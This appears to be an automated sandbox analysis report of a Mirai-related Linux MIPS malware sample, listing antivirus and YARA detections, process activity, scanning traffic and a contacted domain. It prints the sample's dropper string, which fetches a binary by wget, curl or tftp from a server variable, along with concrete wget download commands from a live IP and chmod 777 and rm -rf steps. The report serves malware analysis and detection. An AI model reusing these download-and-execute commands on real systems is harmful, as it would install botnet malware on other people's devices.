Source: /tmp/system |
Avira: detection malicious, Label: EXP/ELF.Agent.J.8 |
Source: shk.14.dr |
String: cd /tmp || cd /var || cd /dev; wget http://$server_ip/$arch -O $binout || curl -O $binout http://$server_ip/$arch || tftp -g -l $binout -r $arch $server_ip |
Source: system.24.dr |
String: /system/proc/self/exe/proc/proc//cmdlineld.sowgettftpcurl/exe |
Source: global traffic |
TCP traffic: 192.168.2.23:36034 -> 185.224.128.34:33335 |
Source: /bin/sh (PID: 6213) |
Wget executable: /usr/bin/wget -> wget http://185.224.128.34/shk |
Jump to behavior |
Source: /bin/sh (PID: 6219) |
Wget executable: /usr/bin/wget -> wget http://185.224.128.34/mips -O system |
Jump to behavior |
Source: /tmp/system (PID: 6221) |
Socket: 127.0.0.1::33337 |
Jump to behavior |
Source: unknown |
TCP traffic detected without corresponding DNS query: 106.148.45.41 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 200.149.252.41 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 223.68.120.41 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 150.96.78.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 78.62.8.114 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 249.225.40.54 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 137.203.160.108 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 32.142.109.173 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 129.109.37.211 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 12.61.57.1 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 143.102.55.216 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 85.108.69.44 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 51.207.27.93 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 106.188.187.62 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 108.84.81.58 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 77.185.84.58 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 249.76.250.189 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 199.15.94.9 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 136.7.114.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 25.75.3.40 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 246.184.16.162 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 109.172.227.147 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 25.90.213.142 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 205.200.24.255 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 71.24.26.169 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 135.152.8.218 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 118.3.19.175 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 76.149.240.145 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 164.245.75.94 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 133.165.237.162 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 191.134.200.230 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 20.149.69.44 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 245.180.32.248 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 63.188.242.150 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 155.149.137.144 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 254.101.85.223 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 215.227.236.246 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 79.94.26.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 46.75.183.200 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 97.243.62.227 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 205.59.146.130 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 195.182.43.120 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 246.146.104.30 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 41.171.76.135 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 141.37.74.243 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 33.86.44.99 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 89.254.150.24 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 35.118.4.255 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 68.38.166.33 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 162.66.218.70 |
Source: global traffic |
HTTP traffic detected: GET /shk HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 185.224.128.34Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mips HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 185.224.128.34Connection: Keep-Alive |
Source: unknown |
DNS traffic detected: queries for: rooty.cc |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 39250 |
Source: unknown |
Network traffic detected: HTTP traffic on port 33606 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 43928 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 42836 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 39250 -> 443 |
Source: 6227.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY |
Matched rule: Detects ELF malware Mirai related Author: Florian Roth |
Source: 6225.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY |
Matched rule: Detects ELF malware Mirai related Author: Florian Roth |
Source: 6223.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY |
Matched rule: Detects ELF malware Mirai related Author: Florian Roth |
Source: 6221.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY |
Matched rule: Detects ELF malware Mirai related Author: Florian Roth |
Source: /tmp/system, type: DROPPED |
Matched rule: Detects ELF malware Mirai related Author: Florian Roth |
Source: /tmp/system (PID: 6225) |
SIGKILL sent: pid: 6223, result: successful |
Jump to behavior |
Source: /tmp/system (PID: 6225) |
SIGKILL sent: pid: 6227, result: successful |
Jump to behavior |
Source: /tmp/system (PID: 6225) |
SIGKILL sent: pid: -6225, result: unknown |
Jump to behavior |
Source: 6227.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY |
Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research |
Source: 6225.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY |
Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research |
Source: 6223.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY |
Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research |
Source: 6221.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY |
Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research |
Source: /tmp/system, type: DROPPED |
Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research |
Source: classification engine |
Classification label: mal68.troj.evad.lin@0/2@1/0 |
Source: /bin/sh (PID: 6215) |
Chmod executable: /usr/bin/chmod -> chmod 777 shk |
Jump to behavior |
Source: /bin/sh (PID: 6220) |
Chmod executable: /usr/bin/chmod -> chmod 777 system |
Jump to behavior |
Source: /bin/sh (PID: 6212) |
Rm executable: /usr/bin/rm -> rm -rf shk |
Jump to behavior |
Source: /bin/sh (PID: 6217) |
Rm executable: /usr/bin/rm -> rm -rf system |
Jump to behavior |
Source: /bin/sh (PID: 6218) |
Rm executable: /usr/bin/rm -> rm -rf mips |
Jump to behavior |
Source: /bin/sh (PID: 6233) |
Rm executable: /usr/bin/rm -> rm -rf system |
Jump to behavior |
Source: /bin/sh (PID: 6234) |
Rm executable: /usr/bin/rm -> rm -rf shk |
Jump to behavior |
Source: /usr/bin/dash (PID: 6298) |
Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.aWATdU1QF5 /tmp/tmp.PRIH5wqT7Y /tmp/tmp.Cs4hpwviby |
Jump to behavior |
Source: /usr/bin/dash (PID: 6299) |
Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.aWATdU1QF5 /tmp/tmp.PRIH5wqT7Y /tmp/tmp.Cs4hpwviby |
Jump to behavior |
Source: /bin/sh (PID: 6213) |
Wget executable: /usr/bin/wget -> wget http://185.224.128.34/shk |
Jump to behavior |
Source: /bin/sh (PID: 6219) |
Wget executable: /usr/bin/wget -> wget http://185.224.128.34/mips -O system |
Jump to behavior |
Source: /usr/bin/chmod (PID: 6215) |
File: /tmp/shk (bits: - usr: rwx grp: rwx all: rwx) |
Jump to behavior |
Source: /usr/bin/chmod (PID: 6220) |
File: /tmp/system (bits: - usr: rwx grp: rwx all: rwx) |
Jump to behavior |
Source: /bin/sh (PID: 6215) |
Chmod executable with 777: /usr/bin/chmod -> chmod 777 shk |
Jump to behavior |
Source: /bin/sh (PID: 6220) |
Chmod executable with 777: /usr/bin/chmod -> chmod 777 system |
Jump to behavior |
Source: /usr/bin/wget (PID: 6219) |
File written: /tmp/system |
Jump to dropped file |
Source: submitted sample |
Stderr: --2024-03-29 09:24:47-- http://185.224.128.34/shkConnecting to 185.224.128.34:80... connected.HTTP request sent,
awaiting response... 200 OKLength: 477Saving to: shk 0K 100% 625K=0.001s2024-03-29
09:24:47 (625 KB/s) - shk saved [477/477]--2024-03-29 09:24:47-- http://185.224.128.34/mipsConnecting to 185.224.128.34:80...
connected.HTTP request sent, awaiting response... 200 OKLength: 71788 (70K)Saving to: system 0K .......... ..........
.......... .......... .......... 71% 141K 0s 50K .......... .......... 100% 543K=0.4s2024-03-29
09:24:48 (179 KB/s) - system saved [71788/71788]: exit code = 0 |
Source: /usr/bin/rm (PID: 6217) |
File: /tmp/system |
Jump to behavior |
Source: /usr/bin/rm (PID: 6233) |
File: /tmp/system |
Jump to behavior |
Source: /tmp/system (PID: 6221) |
Queries kernel information via 'uname': |
Jump to behavior |
Source: sh, 6221.1.000055cbc6d30000.000055cbc6db7000.rw-.sdmp, system, 6221.1.000055cbc6d30000.000055cbc6db7000.rw-.sdmp, system, 6223.1.000055cbc6d30000.000055cbc6db7000.rw-.sdmp, system, 6225.1.000055cbc6d30000.000055cbc6db7000.rw-.sdmp, system, 6227.1.000055cbc6d30000.000055cbc6db7000.rw-.sdmp |
Binary or memory string: /etc/qemu-binfmt/mips |
Source: sh, 6221.1.00007ffd90d55000.00007ffd90d76000.rw-.sdmp, system, 6221.1.00007ffd90d55000.00007ffd90d76000.rw-.sdmp, system, 6223.1.00007ffd90d55000.00007ffd90d76000.rw-.sdmp, system, 6225.1.00007ffd90d55000.00007ffd90d76000.rw-.sdmp, system, 6227.1.00007ffd90d55000.00007ffd90d76000.rw-.sdmp |
Binary or memory string: /usr/bin/qemu-mips |
Source: sh, 6221.1.000055cbc6d30000.000055cbc6db7000.rw-.sdmp, system, 6221.1.000055cbc6d30000.000055cbc6db7000.rw-.sdmp, system, 6223.1.000055cbc6d30000.000055cbc6db7000.rw-.sdmp, system, 6225.1.000055cbc6d30000.000055cbc6db7000.rw-.sdmp, system, 6227.1.000055cbc6d30000.000055cbc6db7000.rw-.sdmp |
Binary or memory string: U1!/etc/qemu-binfmt/mips |
Source: sh, 6221.1.00007ffd90d55000.00007ffd90d76000.rw-.sdmp, system, 6221.1.00007ffd90d55000.00007ffd90d76000.rw-.sdmp, system, 6223.1.00007ffd90d55000.00007ffd90d76000.rw-.sdmp, system, 6225.1.00007ffd90d55000.00007ffd90d76000.rw-.sdmp, system, 6227.1.00007ffd90d55000.00007ffd90d76000.rw-.sdmp |
Binary or memory string: x86_64/usr/bin/qemu-mips./systemtplinkSUDO_GID=1000MAIL=/var/mail/rootUSER=rootHOME=/rootOLDPWD=/tmpCOLORTERM=truecolorSUDO_UID=1000LOGNAME=rootTERM=xterm-256colorPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0LANG=en_US.UTF-8XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_COMMAND=/bin/bashSHELL=/bin/bashSUDO_USER=saturninoPWD=/tmp./system |
Source: Yara match |
File source: 6227.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY |
Source: Yara match |
File source: 6225.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY |
Source: Yara match |
File source: 6223.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY |
Source: Yara match |
File source: 6221.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY |
Source: Yara match |
File source: /tmp/system, type: DROPPED |
Source: Yara match |
File source: 6227.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY |
Source: Yara match |
File source: 6225.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY |
Source: Yara match |
File source: 6223.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY |
Source: Yara match |
File source: 6221.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY |
Source: Yara match |
File source: /tmp/system, type: DROPPED |